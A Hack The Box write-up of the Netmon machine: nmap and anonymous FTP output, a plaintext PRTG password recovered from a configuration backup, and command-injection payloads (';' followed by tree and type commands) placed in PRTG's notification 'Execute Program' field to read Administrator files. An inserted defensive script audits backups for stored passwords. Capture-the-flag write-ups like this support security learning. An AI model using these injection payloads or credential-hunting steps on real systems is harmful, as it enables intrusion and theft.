Today Netmon retired, and this is how I got into the machine. It was rated as the easiest machine on Hack The Box, so let's start.
- OS: Windows
- IP: 10.10.10.152
- Difficulty: Easy
First I ran an nmap scan to get some information about the machine. The result showed that it was a Windows machine with several open ports.

```
# nmap -sV -sC -A -Pn 10.10.10.152
Starting Nmap 7.30 ( https://nmap.org ) at 2019-05-20 13:56 KST
Nmap scan report for 10.10.10.152
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 2024 .rnd
| 02-05-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 184.108.40.20646 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/220.127.116.1146
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew:
|_  -1s: Majority of systems scanned

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds
```
The first thing I looked at was port 21, which was open with anonymous login allowed, so I tried opening it in a web browser. And this is what was inside it.

I opened ftp://10.10.10.152/Users/Public/ and there was the user.txt flag, so I just downloaded it and viewed the user hash.
After getting the user hash via FTP, I started checking port 80 and I got this.

It was some kind of network monitor, so I started searching Google for the PRTG default login information. The default user and password are both prtgadmin, but I could not log in with them.

I then searched Google for a PRTG exploit and found this link, a command injection vulnerability. However, I needed to be logged in to the dashboard to use it.
I went back to the FTP service, but this time I logged in from the terminal with the user Anonymous and a blank password (we can do more things from the terminal than from the browser xD).

```
# ftp Anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49870|)
125 Data connection already open; Transfer starting.
11-20-16  10:46PM       <DIR>          $RECYCLE.BIN
02-03-19  12:18AM                 1024 .rnd
11-20-16  09:59PM               389408 bootmgr
07-16-16  09:10AM                    1 BOOTNXT
02-03-19  08:05AM       <DIR>          Documents and Settings
02-25-19  10:15PM       <DIR>          inetpub
06-04-19  08:37AM            738197504 pagefile.sys
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-25-19  10:56PM       <DIR>          ProgramData
02-03-19  08:05AM       <DIR>          Recovery
02-03-19  08:04AM       <DIR>          System Volume Information
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp>
```

With ls -a I could see more of the hidden directories, and it looked interesting.
I checked every directory and found the PRTG directory, which was /ProgramData/Paessler/PRTG\ Network\ Monitor/.

```
ftp> ls
229 Entering Extended Passive Mode (|||49937|)
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-04-19  08:38AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-04-19  08:38AM       <DIR>          Logs (Web Server)
02-25-19  08:01PM       <DIR>          Monitoring Database
06-04-19  08:46AM              1198183 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-04-19  08:39AM              1647616 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get PRTG\ Configuration.old.bak
```

I downloaded PRTG Configuration.old.bak and checked what was inside the file. Yeah, I found this.
```xml
...
<dbpassword>
  <!-- User: prtgadmin -->
  PrTg@dmin2018
</dbpassword>
...
```
It must be the password for the PRTG web login. But the password was incorrect, so I tried changing it to PrTg@dmin2019 and it worked xD.
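The lesson from the backup file above is that an old configuration copy sitting in a directory reachable over anonymous FTP still carries live secrets. As an added example (not the author's code and not a PRTG tool), here is a small audit script a defender could run over such backups to flag plaintext `<dbpassword>` values before an attacker does. The sample XML is constructed to mirror the fragment quoted above; note that the `<!-- User: ... -->` comment splits the text node, so a naive `.text` read would miss part of the value.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample input, modelled on the fragment quoted in the writeup.
# The comment inside <dbpassword> splits the text node (the edge case handled
# below); the second entry is empty and must not be reported.
SAMPLE_CONFIG = """<prtg>
  <data>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <dbpassword>
    </dbpassword>
  </data>
</prtg>
"""


def find_plaintext_passwords(xml_text: str) -> List[Dict[str, str]]:
    """Return every non-empty <dbpassword> value together with the user
    hinted in an adjacent XML comment (empty string when there is no hint)."""
    # insert_comments=True keeps comments as child nodes so the hint survives
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    findings: List[Dict[str, str]] = []
    for elem in root.iter("dbpassword"):
        pieces = [elem.text or ""]
        user_hint = ""
        for child in elem:
            if child.tag is ET.Comment:
                match = re.search(r"User:\s*(\S+)", child.text or "")
                if match:
                    user_hint = match.group(1)
            # text that follows a comment lives in the comment's .tail
            pieces.append(child.tail or "")
        secret = "".join(pieces).strip()
        if secret:
            findings.append({"user": user_hint, "password": secret})
    return findings


def mask(secret: str) -> str:
    """Show only enough of a secret to identify it in a report."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def report(xml_text: str) -> List[str]:
    """Human-readable findings, with the password value masked."""
    return [f"user={f['user'] or '?'} password={mask(f['password'])}"
            for f in find_plaintext_passwords(xml_text)]


if __name__ == "__main__":
    for line in report(SAMPLE_CONFIG):
        print(line)
```

Pointing `report()` at every `PRTG Configuration*.dat/.old/.bak` file under the PRTG data directory gives an inventory of stored credentials without echoing the full values into logs; any hit in a backup that is readable by an unauthenticated FTP user is the finding to fix first.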
Following that link, I tried executing a command to test whether it worked.

- In the Account Settings section, click on Notifications.
- Click on any Notification to edit it, or add a new one.
- Find the Execute Program option and turn it on.
- Put in a command to execute. First I used `output.txt; tree /f C:\Users\Administrator > C:\output.txt` to check the location of root.txt.
- Go back to the Notification object page and click Send test notification (PRTG System Administrator).
- After that, open the FTP root again; the output.txt file should be there.
- Download and view that file.
```
Folder PATH listing
Volume serial number is 00000200 684B:9CE8
C:\USERS\ADMINISTRATOR
├───Contacts
├───Desktop
│   └───root.txt
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos
```

The root.txt file was located in C:\Users\Administrator\Desktop.
I went back to the PRTG dashboard again and edited the command in the notification to `output.txt; type C:\Users\Administrator\Desktop\root.txt > C:\output.txt`.

After sending a test notification, I got the root flag in the output file.

Edited: I just found this way and it is much easier lolz => Link